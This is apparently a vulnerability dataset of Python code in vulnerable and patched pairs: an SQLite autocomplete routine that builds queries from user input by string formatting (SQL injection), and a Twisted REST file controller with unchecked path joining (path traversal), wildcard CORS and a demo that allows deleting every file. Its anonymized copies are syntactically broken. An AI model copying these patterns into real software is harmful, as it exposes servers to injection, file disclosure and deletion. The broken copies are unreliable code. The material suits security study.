print(f"INFO: Query 1")
#cursor.execute("SELECT term FROM term WHERE term LIKE \"%s%%\" ORDER BY length(term),term LIMIT %s" % (word,1000))
cursor.execute(f"SELECT term FROM terms WHERE term > \"{floor}\" AND term < \"{ceiling}\" AND term LIKE \"{word}%%\" ORDER BY length(term),term LIMIT {requested_limit}")
rows = cursor.fetchall()
values_dict = {}
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
values_dict[term.upper()] = 1
n_values += 1
if n_values >= requested_limit:
break
t1 = timeit.default_timer()
if debug:
print(f"INFO: Query 1 in {t1-t0} sec")
#### If we haven't reached the limit yet, add a list of matching terms that contain this string
if n_values < requested_limit:
if debug:
print(f"INFO: Query 2")
#### See if there is a cached entry already
word_part = word
found_fragment = None
while len(word_part) > 2:
cursor.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{word_part}\"")
rows = cursor.fetchall()
if len(rows) > 0:
fragment_id = rows[0][0]
found_fragment = rows[0][1]
break
word_part = word_part[:-1]
if found_fragment:
if debug:
print(f"Found matching fragment {found_fragment} as fragment_id {fragment_id}")
cursor.execute(f"SELECT term FROM cached_fragment_terms WHERE fragment_id = {fragment_id} AND term LIKE \"%%{word}%%\"")
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
if found_fragment is None:
#### Cache this fragment in the database
cursor.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (word,))
fragment_id = cursor.lastrowid
if debug:
print(f"fragment_id = {fragment_id}")
#### Execute an expensive LIKE query
cursor.execute("SELECT term FROM terms WHERE term LIKE \"%%%s%%\" ORDER BY length(term),term LIMIT %s" % (word,10000))
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
values_dict[term.upper()] = 1
cursor.execute("INSERT INTO cached_fragment_terms(fragment_id, term) VALUES(?,?)", (fragment_id, term,))
conn.commit()
t2 = timeit.default_timer()
if debug:
print(f"INFO: Query 2 in {t2-t1} sec")
return(values)
| import sqlite3
import re
import timeit
import sys
import os
pathlist = os.path.realpath(__file__).split(os.path.sep)
RTXindex = pathlist.index("RTX")
sys.path.append(os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code']))
from RTXConfiguration import RTXConfiguration
RTXConfig = RTXConfiguration()
autocomplete_filepath = os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code', 'autocomplete'])
conn = None
cursor = None
def load():
global conn
global cursor
database_name = f"{autocomplete_filepath}{os.path.sep}{RTXConfig.autocomplete_path.split('/')[-1]}"
conn = sqlite3.connect(database_name)
cursor = conn.cursor()
#print(f"INFO: Connected to {database_name}",file=sys.stderr)
return True
def get_nodes_like(word,requested_limit):
debug = False
t0 = timeit.default_timer()
requested_limit = int(requested_limit)
values = []
n_values = 0
if len(word) < 2:
return values
#### Try to avoid SQL injection exploits by sanitizing input #1823
word = word.replace('"','')
floor = word[:-1]
ceiling = floor + 'zz'
#### Get a list of matching node names that begin with these letters
if debug:
print(f"INFO: Query 1")
#cursor.execute("SELECT term FROM term WHERE term LIKE \"%s%%\" ORDER BY length(term),term LIMIT %s" % (word,1000))
cursor.execute(f"SELECT term FROM terms WHERE term > \"{floor}\" AND term < \"{ceiling}\" AND term LIKE \"{word}%%\" ORDER BY length(term),term LIMIT {requested_limit}")
rows = cursor.fetchall()
values_dict = {}
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
values_dict[term.upper()] = 1
n_values += 1
if n_values >= requested_limit:
break
t1 = timeit.default_timer()
if debug:
print(f"INFO: Query 1 in {t1-t0} sec")
#### If we haven't reached the limit yet, add a list of matching terms that contain this string
if n_values < requested_limit:
if debug:
print(f"INFO: Query 2")
#### See if there is a cached entry already
word_part = word
found_fragment = None
while len(word_part) > 2:
cursor.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{word_part}\"")
rows = cursor.fetchall()
if len(rows) > 0:
fragment_id = rows[0][0]
found_fragment = rows[0][1]
break
word_part = word_part[:-1]
if found_fragment:
if debug:
print(f"Found matching fragment {found_fragment} as fragment_id {fragment_id}")
cursor.execute(f"SELECT term FROM cached_fragment_terms WHERE fragment_id = {fragment_id} AND term LIKE \"%%{word}%%\"")
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
if found_fragment is None:
#### Cache this fragment in the database
try:
cursor.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (word,))
fragment_id = cursor.lastrowid
except:
print(f"ERROR: Unable to INSERT into cached_fragments(fragment)",file=sys.stderr)
fragment_id = 0
if debug:
print(f"fragment_id = {fragment_id}")
#### Execute an expensive LIKE query
cursor.execute("SELECT term FROM terms WHERE term LIKE \"%%%s%%\" ORDER BY length(term),term LIMIT %s" % (word,10000))
rows = cursor.fetchall()
for row in rows:
term = row[0]
if term.upper() not in values_dict:
if n_values < requested_limit:
if debug:
print(f" - {term}")
properties = { "curie": '??', "name": term, "type": '??' }
values.append(properties)
n_values += 1
values_dict[term.upper()] = 1
cursor.execute("INSERT INTO cached_fragment_terms(fragment_id, term) VALUES(?,?)", (fragment_id, term,))
conn.commit()
t2 = timeit.default_timer()
if debug:
print(f"INFO: Query 2 in {t2-t1} sec")
return(values)
| sql | {
"code": [
" cursor.execute(\"INSERT INTO cached_fragments(fragment) VALUES(?)\", (word,))",
" fragment_id = cursor.lastrowid"
],
"line_no": [
106,
107
]
} | {
"code": [
" try:",
" fragment_id = cursor.lastrowid",
" except:",
" fragment_id = 0"
],
"line_no": [
110,
112,
113,
115
]
} | import sqlite3
import re
import timeit
import sys
import os
VAR_0 = os.path.realpath(__file__).split(os.path.sep)
VAR_1 = VAR_0.index("RTX")
sys.path.append(os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code']))
from RTXConfiguration import .RTXConfiguration
VAR_2 = RTXConfiguration()
VAR_3 = os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code', 'autocomplete'])
VAR_4 = None
VAR_5 = None
def FUNC_0():
global VAR_4
global VAR_5
VAR_8 = f"{VAR_3}{os.path.sep}{VAR_2.autocomplete_path.split('/')[-1]}"
VAR_4 = sqlite3.connect(VAR_8)
VAR_5 = VAR_4.cursor()
return True
def FUNC_1(VAR_6,VAR_7):
VAR_9 = False
VAR_10 = timeit.default_timer()
VAR_7 = int(VAR_7)
VAR_11 = []
VAR_12 = 0
if len(VAR_6) < 2:
return VAR_11
VAR_13 = VAR_6[:-1]
VAR_14 = VAR_13 + 'zz'
if VAR_9:
print(f"INFO: Query 1")
VAR_5.execute(f"SELECT VAR_18 FROM terms WHERE VAR_18 > \"{VAR_13}\" AND VAR_18 < \"{VAR_14}\" AND VAR_18 LIKE \"{VAR_6}%%\" ORDER BY length(VAR_18),term LIMIT {VAR_7}")
VAR_15 = VAR_5.fetchall()
VAR_16 = {}
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_16[VAR_18.upper()] = 1
VAR_12 += 1
if VAR_12 >= VAR_7:
break
VAR_17 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 1 in {VAR_17-VAR_10} sec")
if VAR_12 < VAR_7:
if VAR_9:
print(f"INFO: Query 2")
VAR_19 = VAR_6
VAR_20 = None
while len(VAR_19) > 2:
VAR_5.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{VAR_19}\"")
VAR_15 = VAR_5.fetchall()
if len(VAR_15) > 0:
VAR_23 = VAR_15[0][0]
VAR_20 = VAR_15[0][1]
break
VAR_19 = word_part[:-1]
if VAR_20:
if VAR_9:
print(f"Found matching fragment {VAR_20} as VAR_23 {fragment_id}")
VAR_5.execute(f"SELECT VAR_18 FROM cached_fragment_terms WHERE VAR_23 = {VAR_23} AND VAR_18 LIKE \"%%{VAR_6}%%\"")
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
if VAR_20 is None:
VAR_5.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (VAR_6,))
VAR_23 = VAR_5.lastrowid
if VAR_9:
print(f"fragment_id = {VAR_23}")
VAR_5.execute("SELECT VAR_18 FROM terms WHERE VAR_18 LIKE \"%%%s%%\" ORDER BY length(VAR_18),term LIMIT %s" % (VAR_6,10000))
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
VAR_16[VAR_18.upper()] = 1
VAR_5.execute("INSERT INTO cached_fragment_terms(VAR_23, VAR_18) VALUES(?,?)", (VAR_23, VAR_18,))
VAR_4.commit()
VAR_21 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 2 in {VAR_21-VAR_17} sec")
return(VAR_11)
| import sqlite3
import re
import timeit
import sys
import os
VAR_0 = os.path.realpath(__file__).split(os.path.sep)
VAR_1 = VAR_0.index("RTX")
sys.path.append(os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code']))
from RTXConfiguration import .RTXConfiguration
VAR_2 = RTXConfiguration()
VAR_3 = os.path.sep.join([*VAR_0[:(VAR_1 + 1)], 'code', 'autocomplete'])
VAR_4 = None
VAR_5 = None
def FUNC_0():
global VAR_4
global VAR_5
VAR_8 = f"{VAR_3}{os.path.sep}{VAR_2.autocomplete_path.split('/')[-1]}"
VAR_4 = sqlite3.connect(VAR_8)
VAR_5 = VAR_4.cursor()
return True
def FUNC_1(VAR_6,VAR_7):
VAR_9 = False
VAR_10 = timeit.default_timer()
VAR_7 = int(VAR_7)
VAR_11 = []
VAR_12 = 0
if len(VAR_6) < 2:
return VAR_11
VAR_6 = word.replace('"','')
VAR_13 = VAR_6[:-1]
VAR_14 = VAR_13 + 'zz'
if VAR_9:
print(f"INFO: Query 1")
VAR_5.execute(f"SELECT VAR_18 FROM terms WHERE VAR_18 > \"{VAR_13}\" AND VAR_18 < \"{VAR_14}\" AND VAR_18 LIKE \"{VAR_6}%%\" ORDER BY length(VAR_18),term LIMIT {VAR_7}")
VAR_15 = VAR_5.fetchall()
VAR_16 = {}
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_16[VAR_18.upper()] = 1
VAR_12 += 1
if VAR_12 >= VAR_7:
break
VAR_17 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 1 in {VAR_17-VAR_10} sec")
if VAR_12 < VAR_7:
if VAR_9:
print(f"INFO: Query 2")
VAR_19 = VAR_6
VAR_20 = None
while len(VAR_19) > 2:
VAR_5.execute(f"SELECT rowid, fragment FROM cached_fragments WHERE fragment == \"{VAR_19}\"")
VAR_15 = VAR_5.fetchall()
if len(VAR_15) > 0:
VAR_23 = VAR_15[0][0]
VAR_20 = VAR_15[0][1]
break
VAR_19 = word_part[:-1]
if VAR_20:
if VAR_9:
print(f"Found matching fragment {VAR_20} as VAR_23 {fragment_id}")
VAR_5.execute(f"SELECT VAR_18 FROM cached_fragment_terms WHERE VAR_23 = {VAR_23} AND VAR_18 LIKE \"%%{VAR_6}%%\"")
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
if VAR_20 is None:
try:
VAR_5.execute("INSERT INTO cached_fragments(fragment) VALUES(?)", (VAR_6,))
VAR_23 = VAR_5.lastrowid
except:
print(f"ERROR: Unable to INSERT into cached_fragments(fragment)",file=sys.stderr)
VAR_23 = 0
if VAR_9:
print(f"fragment_id = {VAR_23}")
VAR_5.execute("SELECT VAR_18 FROM terms WHERE VAR_18 LIKE \"%%%s%%\" ORDER BY length(VAR_18),term LIMIT %s" % (VAR_6,10000))
VAR_15 = VAR_5.fetchall()
for row in VAR_15:
VAR_18 = row[0]
if VAR_18.upper() not in VAR_16:
if VAR_12 < VAR_7:
if VAR_9:
print(f" - {VAR_18}")
VAR_22 = { "curie": '??', "name": VAR_18, "type": '??' }
VAR_11.append(VAR_22)
VAR_12 += 1
VAR_16[VAR_18.upper()] = 1
VAR_5.execute("INSERT INTO cached_fragment_terms(VAR_23, VAR_18) VALUES(?,?)", (VAR_23, VAR_18,))
VAR_4.commit()
VAR_21 = timeit.default_timer()
if VAR_9:
print(f"INFO: Query 2 in {VAR_21-VAR_17} sec")
return(VAR_11)
| [
6,
11,
14,
15,
18,
19,
27,
28,
30,
32,
35,
38,
41,
44,
45,
48,
66,
67,
71,
72,
83,
87,
90,
94,
101,
102,
104,
105,
110,
111,
114,
118,
125,
129,
133,
134,
136,
137
] | [
6,
11,
14,
15,
18,
19,
26,
28,
29,
31,
33,
36,
39,
42,
43,
45,
48,
49,
52,
70,
71,
75,
76,
87,
91,
94,
98,
105,
106,
108,
109,
118,
119,
122,
126,
133,
137,
141,
142,
144,
145
] |
0CWE-22
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
RESTful Filesystem access using HTTP
------------------------------------
This controller and helper classes exposes parts or all of the server's
filesystem. Means to retrieve and delete files are provided as well as the
ability to list folder contents.
The generated responses are returned as JSON data with appropriate HTTP headers.
Output will be compressed using gzip most of the times.
Example calls using curl
++++++++++++++++++++++++
The following examples assume that the FileController instance is accessible
as '/file' on 'localhost', port 18888 (http://localhost:18888/file).
Fetch list of files and folders in root folder:
curl --noproxy localhost -iv http://localhost:18888/file
Fetch example file 'example.txt'
curl --noproxy localhost -iv http://localhost:18888/file/example.txt
Fetch gzipped example file 'example.txt'
curl --compressed -H "Accept-Encoding: gzip" --noproxy localhost -iv http://localhost:18888/file/example.txt
Delete example file 'example.txt'
curl --noproxy localhost -iv -X DELETE http://localhost:18888/file/example.txt
"""
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
import file
MANY_SLASHES_PATTERN = r'[\/]+'
MANY_SLASHES_REGEX = re.compile(MANY_SLASHES_PATTERN)
#: default path from which files will be served
DEFAULT_ROOT_PATH = os.path.abspath(os.path.dirname(__file__))
#: CORS - HTTP headers the client may use
CORS_ALLOWED_CLIENT_HEADERS = [
'Content-Type',
]
#: CORS - HTTP methods the client may use
CORS_ALLOWED_METHODS_DEFAULT = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
#: CORS - default origin header value
CORS_DEFAULT_ALLOW_ORIGIN = '*'
#: CORS - HTTP headers the server will send as part of OPTIONS response
CORS_DEFAULT = {
'Access-Control-Allow-Origin': CORS_DEFAULT_ALLOW_ORIGIN,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(CORS_ALLOWED_METHODS_DEFAULT),
'Access-Control-Allow-Headers': ', '.join(CORS_ALLOWED_CLIENT_HEADERS)
}
#: paths where file delete operations shall be allowed
DELETE_WHITELIST = [
'/media',
]
class FileController(twisted.web.resource.Resource):
isLeaf = True
_override_args = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
_resource_prefix = '/file'
_root = os.path.abspath(os.path.dirname(__file__))
_do_delete = False
_delete_whitelist = DELETE_WHITELIST
never_gzip_extensions = ('.ts',)
def __init__(self, *args, **kwargs):
"""
Default Constructor.
Args:
resource_prefix: Prefix value for this controller instance.
Default is :py:data:`FileController._resource_prefix`
root: Root path of files to be served.
Default is the path where the current file is located
do_delete: Try to actually delete files?
Default is False.
delete_whitelist: Folder prefixes where delete operations are
allowed _at all_. Default is :py:data:`DELETE_WHITELIST`
"""
if args:
for key, value in zip(self._override_args, args):
kwargs[key] = value
for arg_name in self._override_args:
if kwargs.get(arg_name) is not None:
attr_name = '_{:s}'.format(arg_name)
setattr(self, attr_name, kwargs.get(arg_name))
self.session = kwargs.get("session")
def _json_response(self, request, data):
"""
Create a JSON representation for *data* and set HTTP headers indicating
that JSON encoded data is returned.
Args:
request (twisted.web.server.Request): HTTP request object
data: response content
Returns:
JSON representation of *data* with appropriate HTTP headers
"""
request.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(data, indent=2)
def get_response_data_template(self, request):
"""
Generate a response data :class:`dict` containing default values and
some request attribute values for debugging purposes.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
(dict) response template data
"""
file_path = None
if request.path.startswith(self._resource_prefix):
file_path = request.path[len(self._resource_prefix):]
response_data = {
"_request": {
"path": request.path,
"uri": request.uri,
"method": request.method,
"postpath": request.postpath,
"file_path": file_path,
},
"result": False,
}
return response_data
def error_response(self, request, response_code=None, **kwargs):
"""
Create and return an HTTP error response with data as JSON.
Args:
request (twisted.web.server.Request): HTTP request object
response_code: HTTP Status Code (default is 500)
**kwargs: additional key/value pairs
Returns:
JSON encoded data with appropriate HTTP headers
"""
if response_code is None:
response_code = http.INTERNAL_SERVER_ERROR
response_data = self.get_response_data_template(request)
response_data.update(**kwargs)
response_data['me'] = dict()
for arg_name in self._override_args:
attr_name = '_{:s}'.format(arg_name)
response_data['me'][attr_name] = getattr(self, attr_name)
request.setResponseCode(response_code)
return self._json_response(request, response_data)
def _existing_path_or_bust(self, request):
"""
Verify that a filesystem location which is contained in *request.path*
is valid and an existing path.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
path
Raises:
ValueError: If contained path value is invalid.
IOError: If contained path value is not existing.
"""
rq_path = urlparse.unquote(request.path)
if not rq_path.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(request.path))
file_path = os.path.join(
self._root, rq_path[len(self._resource_prefix) + 1:])
file_path = re.sub(MANY_SLASHES_REGEX, '/', file_path)
if not os.path.exists(file_path):
raise IOError("Not Found {!r}".format(file_path))
return file_path
def render_OPTIONS(self, request):
"""
Render response for an HTTP OPTIONS request.
Example request
curl -iv --noproxy localhost http://localhost:18888/file
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
for key in CORS_DEFAULT:
request.setHeader(key, CORS_DEFAULT[key])
return ''
def render_legacy(self, request):
"""
Render response for an HTTP GET request. In order to maintain
backward compatibility this method emulates the behaviour of the
legacy method implementation.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
return file.FileController().render(request)
def _glob(self, path, pattern='*'):
if path == '/':
glob_me = '/' + pattern
else:
glob_me = '/'.join((path, pattern))
return glob.iglob(glob_me)
def _walk(self, path):
for root, dirs, files in os.walk(path):
for dir_item in dirs:
yield os.path.join(root, dir_item)
for file_item in files:
yield os.path.join(root, file_item)
def render_path_listing(self, request, path):
"""
Generate a file/folder listing of *path*'s contents.
Args:
request (twisted.web.server.Request): HTTP request object
path: folder location
Returns:
HTTP response with headers
"""
response_data = self.get_response_data_template(request)
response_data.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
generator = None
if "pattern" in request.args:
generator = self._glob(path, request.args["pattern"][0])
if "recursive" in request.args:
generator = self._walk(path)
if generator is None:
generator = self._glob(path)
for item in generator:
if os.path.isdir(item):
response_data['dirs'].append(item)
else:
response_data['files'].append(item)
return self._json_response(request, response_data)
def render_file(self, request, path):
"""
Return the contents of file *path*.
Args:
request (twisted.web.server.Request): HTTP request object
path: file path
Returns:
HTTP response with headers
"""
(_, ext) = os.path.splitext(path)
if ext in self.never_gzip_extensions:
# hack: remove gzip from the list of supported encodings
acceptHeaders = request.requestHeaders.getRawHeaders(
'accept-encoding', [])
supported = ','.join(acceptHeaders).split(',')
request.requestHeaders.setRawHeaders(
'accept-encoding', list(set(supported) - {'gzip'}))
result = twisted.web.static.File(
path, defaultType="application/octet-stream")
return result.render(request)
def render_GET(self, request):
"""
HTTP GET request handler returning
* legacy response if the query *file* or *dir* parameter is set
* file contents if *request.path* contains a file path
* directory listing if *request.path* contains a folder path
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
attic_args = {'file', 'dir'}
if len(attic_args & set(request.args.keys())) >= 1:
return self.render_legacy(request)
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.render_path_listing(request, target_path)
else:
return self.render_file(request, target_path)
def render_POST(self, request):
"""
HTTP POST request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_PUT(self, request):
"""
HTTP PUT request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_DELETE(self, request):
"""
HTTP DELETE request handler which may try to delete a file if its
path's prefix is in :py:data:`FileController._delete_whitelist` and
:py:data:`FileController._do_delete` is True.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.error_response(
request, response_code=http.NOT_IMPLEMENTED,
message='Will not remove folder {!r}'.format(target_path))
for prefix in self._delete_whitelist:
if not target_path.startswith(os.path.abspath(prefix)):
return self.error_response(request,
response_code=http.FORBIDDEN)
response_data = self.get_response_data_template(request)
try:
response_data['result'] = True
if self._do_delete:
os.unlink(target_path)
message = 'Removed {!r}'.format(target_path)
else:
message = 'WOULD remove {!r}'.format(target_path)
response_data['message'] = message
except Exception as eexc:
response_data['message'] = 'Cannot remove {!r}: {!s}'.format(
target_path, eexc.message)
request.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(request, response_data)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
# standard factory example
factory_s = Site(FileController(DEFAULT_ROOT_PATH))
# experimental factory
root = Resource()
root.putChild("/", FileController)
root.putChild("/file", FileController)
factory_r = Site(root)
# experimental factory: enable gzip compression
wrapped = EncodingResourceWrapper(
FileController(
root=DEFAULT_ROOT_PATH,
# DANGER, WILL ROBINSON! These values allow deletion of ALL files!
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
factory_s_gz = Site(wrapped)
reactor.listenTCP(18888, factory_s_gz)
reactor.run()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
RESTful Filesystem access using HTTP
------------------------------------
This controller and helper classes exposes parts or all of the server's
filesystem. Means to retrieve and delete files are provided as well as the
ability to list folder contents.
The generated responses are returned as JSON data with appropriate HTTP headers.
Output will be compressed using gzip most of the times.
Example calls using curl
++++++++++++++++++++++++
The following examples assume that the FileController instance is accessible
as '/file' on 'localhost', port 18888 (http://localhost:18888/file).
Fetch list of files and folders in root folder:
curl --noproxy localhost -iv http://localhost:18888/file
Fetch example file 'example.txt'
curl --noproxy localhost -iv http://localhost:18888/file/example.txt
Fetch gzipped example file 'example.txt'
curl --compressed -H "Accept-Encoding: gzip" --noproxy localhost -iv http://localhost:18888/file/example.txt
Delete example file 'example.txt'
curl --noproxy localhost -iv -X DELETE http://localhost:18888/file/example.txt
"""
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
from utilities import MANY_SLASHES_REGEX
import file
#: default path from which files will be served
DEFAULT_ROOT_PATH = os.path.abspath(os.path.dirname(__file__))
#: CORS - HTTP headers the client may use
CORS_ALLOWED_CLIENT_HEADERS = [
'Content-Type',
]
#: CORS - HTTP methods the client may use
CORS_ALLOWED_METHODS_DEFAULT = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
#: CORS - default origin header value
CORS_DEFAULT_ALLOW_ORIGIN = '*'
#: CORS - HTTP headers the server will send as part of OPTIONS response
CORS_DEFAULT = {
'Access-Control-Allow-Origin': CORS_DEFAULT_ALLOW_ORIGIN,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(CORS_ALLOWED_METHODS_DEFAULT),
'Access-Control-Allow-Headers': ', '.join(CORS_ALLOWED_CLIENT_HEADERS)
}
#: paths where file delete operations shall be allowed
DELETE_WHITELIST = [
'/media',
]
class FileController(twisted.web.resource.Resource):
isLeaf = True
_override_args = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
_resource_prefix = '/file'
_root = os.path.abspath(os.path.dirname(__file__))
_do_delete = False
_delete_whitelist = DELETE_WHITELIST
never_gzip_extensions = ('.ts',)
def __init__(self, *args, **kwargs):
"""
Default Constructor.
Args:
resource_prefix: Prefix value for this controller instance.
Default is :py:data:`FileController._resource_prefix`
root: Root path of files to be served.
Default is the path where the current file is located
do_delete: Try to actually delete files?
Default is False.
delete_whitelist: Folder prefixes where delete operations are
allowed _at all_. Default is :py:data:`DELETE_WHITELIST`
"""
if args:
for key, value in zip(self._override_args, args):
kwargs[key] = value
for arg_name in self._override_args:
if kwargs.get(arg_name) is not None:
attr_name = '_{:s}'.format(arg_name)
setattr(self, attr_name, kwargs.get(arg_name))
self.session = kwargs.get("session")
def _json_response(self, request, data):
"""
Create a JSON representation for *data* and set HTTP headers indicating
that JSON encoded data is returned.
Args:
request (twisted.web.server.Request): HTTP request object
data: response content
Returns:
JSON representation of *data* with appropriate HTTP headers
"""
request.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(data, indent=2)
def get_response_data_template(self, request):
"""
Generate a response data :class:`dict` containing default values and
some request attribute values for debugging purposes.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
(dict) response template data
"""
file_path = None
if request.path.startswith(self._resource_prefix):
file_path = request.path[len(self._resource_prefix):]
response_data = {
"_request": {
"path": request.path,
"uri": request.uri,
"method": request.method,
"postpath": request.postpath,
"file_path": file_path,
},
"result": False,
}
return response_data
def error_response(self, request, response_code=None, **kwargs):
"""
Create and return an HTTP error response with data as JSON.
Args:
request (twisted.web.server.Request): HTTP request object
response_code: HTTP Status Code (default is 500)
**kwargs: additional key/value pairs
Returns:
JSON encoded data with appropriate HTTP headers
"""
if response_code is None:
response_code = http.INTERNAL_SERVER_ERROR
response_data = self.get_response_data_template(request)
response_data.update(**kwargs)
response_data['me'] = dict()
for arg_name in self._override_args:
attr_name = '_{:s}'.format(arg_name)
response_data['me'][attr_name] = getattr(self, attr_name)
request.setResponseCode(response_code)
return self._json_response(request, response_data)
def _existing_path_or_bust(self, request):
"""
Verify that a filesystem location which is contained in *request.path*
is valid and an existing path.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
path
Raises:
ValueError: If contained path value is invalid.
IOError: If contained path value is not existing.
"""
rq_path = urlparse.unquote(request.path)
if not rq_path.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(request.path))
file_path = os.path.join(
self._root, rq_path[len(self._resource_prefix) + 1:])
file_path = re.sub(MANY_SLASHES_REGEX, '/', file_path)
if not os.path.exists(file_path):
raise IOError("Not Found {!r}".format(file_path))
return file_path
def render_OPTIONS(self, request):
"""
Render response for an HTTP OPTIONS request.
Example request
curl -iv --noproxy localhost http://localhost:18888/file
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
for key in CORS_DEFAULT:
request.setHeader(key, CORS_DEFAULT[key])
return ''
def render_legacy(self, request):
"""
Render response for an HTTP GET request. In order to maintain
backward compatibility this method emulates the behaviour of the
legacy method implementation.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
return file.FileController().render(request)
def _glob(self, path, pattern='*'):
if path == '/':
glob_me = '/' + pattern
else:
glob_me = '/'.join((path, pattern))
return glob.iglob(glob_me)
def _walk(self, path):
for root, dirs, files in os.walk(path):
for dir_item in dirs:
yield os.path.join(root, dir_item)
for file_item in files:
yield os.path.join(root, file_item)
def render_path_listing(self, request, path):
"""
Generate a file/folder listing of *path*'s contents.
Args:
request (twisted.web.server.Request): HTTP request object
path: folder location
Returns:
HTTP response with headers
"""
response_data = self.get_response_data_template(request)
response_data.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
generator = None
if "pattern" in request.args:
generator = self._glob(path, request.args["pattern"][0])
